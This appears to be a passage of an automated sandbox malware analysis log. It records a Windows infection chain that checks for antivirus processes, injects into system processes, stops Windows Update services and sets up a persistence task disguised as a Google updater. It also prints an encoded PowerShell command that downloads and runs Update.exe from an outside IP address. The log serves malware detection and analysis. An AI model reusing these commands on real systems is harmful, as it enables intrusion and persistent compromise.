            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E949510000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 242F9650000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 28946B90000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 264105C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20FC8E50000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A115080000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E89E6C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Local\Temp\Update.exe base: 1FA89340000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Local\Temp\Update.exe base: 1F142960000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Local\Temp\Update.exe base: 1BD01450000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Local\Temp\Update.exe base: 20601B20000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exe base: 29F03070000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe base: 18C15EF0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1FAC8F40000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1E2DD3B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28D0DB10000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 203707E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\schtasks.exe base: 1EB0EAA0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 24BAA650000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 26DFBD60000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 26DFBD90000 value starts with: 4D5A
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\System32\dialer.exeMemory written: PID: 2580 base: 3020000 value: 4D
            Maps a DLL or memory area into another process
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeThread register set: target process: 368
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeThread register set: target process: 2436
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifMemory written: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe base: 5B0000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifMemory written: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe base: 7BB000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifMemory written: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe base: 3A0000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifMemory written: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe base: 5EE000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeMemory written: C:\Windows\System32\dialer.exe base: 537877E010
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeMemory written: C:\Windows\System32\dialer.exe base: 5191D9E010
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC670000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEEB0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B370000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166940000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 3020000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E949510000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 242F9650000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 28946B90000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 264105C0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20FC8E50000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A115080000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E89E6C0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Local\Temp\Update.exe base: 1FA89340000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Local\Temp\Update.exe base: 1F142960000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Local\Temp\Update.exe base: 1BD01450000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Local\Temp\Update.exe base: 20601B20000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exe base: 29F03070000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe base: 18C15EF0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1FAC8F40000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1E2DD3B0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28D0DB10000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 203707E0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\schtasks.exe base: 1EB0EAA0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 24BAA650000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 26DFBD60000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 26DFBD90000
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_004218E3 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,19_2_004218E3
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00402F58 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_00402F58
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003DF64C GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,19_2_003DF64C
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0042E9C8 mouse_event,19_2_0042E9C8
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Returning Returning.cmd & Returning.cmd & exitJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 287175Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "COALITIONFIBERRELPASTE" Gays Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Yoga + Sail 287175\BJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\287175\Surrey.pif Surrey.pif BJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifProcess created: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifProcess created: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHESTJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif" "C:\Users\user\AppData\Local\MindZenith Innovations Co\g"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif" "C:\Users\user\AppData\Local\MindZenith Innovations Co\g"
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Update.exe "C:\Users\user\AppData\Local\Temp\Update.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A"
            Source: C:\Users\user\AppData\Local\Temp\Update.exeProcess created: C:\Users\user\AppData\Local\Temp\Update.exe "C:\Users\user\AppData\Local\Temp\Update.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Update.exe "C:\Users\user\AppData\Local\Temp\Update.exe"
            Source: C:\Users\user\AppData\Local\Temp\Update.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exe "C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exe"
            Source: C:\Users\user\AppData\Local\Temp\Update.exeProcess created: C:\Users\user\AppData\Local\Temp\Update.exe "C:\Users\user\AppData\Local\Temp\Update.exe"
            Source: C:\Users\user\AppData\Local\Temp\Update.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe "C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe"
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "kaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0ackalgbeag8adwbuagwabwbhagqargbpagwazqaoaccaaab0ahqacaa6ac8alwa1adealga3adcalgaxadqamaauadcanaavahaayqbnaguacwavafuacabkageadablac4azqb4aguajwasacaapaajag0aaab0acmapgagacgasgbvagkabgatafaayqb0aggaiaa8acmazab2agcaiwa+acaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmaegbyagiaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccavqbwagqayqb0agualgblahgazqanackakqa8acmaygblaheaiwa+adsaiabtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiaa8acmaeqbqagyaiwa+acaakabkag8aaqbuac0auabhahqaaaagac0auabhahqaaaagacqazqbuahyaogbuaguabqbwacaapaajagqababuacmapgagac0aqwboagkababkafaayqb0aggaiaanafuacabkageadablac4azqb4aguajwapadwaiwbragmabgajad4a"
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "kaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0ackalgbeag8adwbuagwabwbhagqargbpagwazqaoaccaaab0ahqacaa6ac8alwa1adealga3adcalgaxadqamaauadcanaavahaayqbnaguacwavafuacabkageadablac4azqb4aguajwasacaapaajag0aaab0acmapgagacgasgbvagkabgatafaayqb0aggaiaa8acmazab2agcaiwa+acaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmaegbyagiaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccavqbwagqayqb0agualgblahgazqanackakqa8acmaygblaheaiwa+adsaiabtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiaa8acmaeqbqagyaiwa+acaakabkag8aaqbuac0auabhahqaaaagac0auabhahqaaaagacqazqbuahyaogbuaguabqbwacaapaajagqababuacmapgagac0aqwboagkababkafaayqb0aggaiaanafuacabkageadablac4azqb4aguajwapadwaiwbragmabgajad4a"
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#cmkpzahpq#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
            Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#cmkpzahpq#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
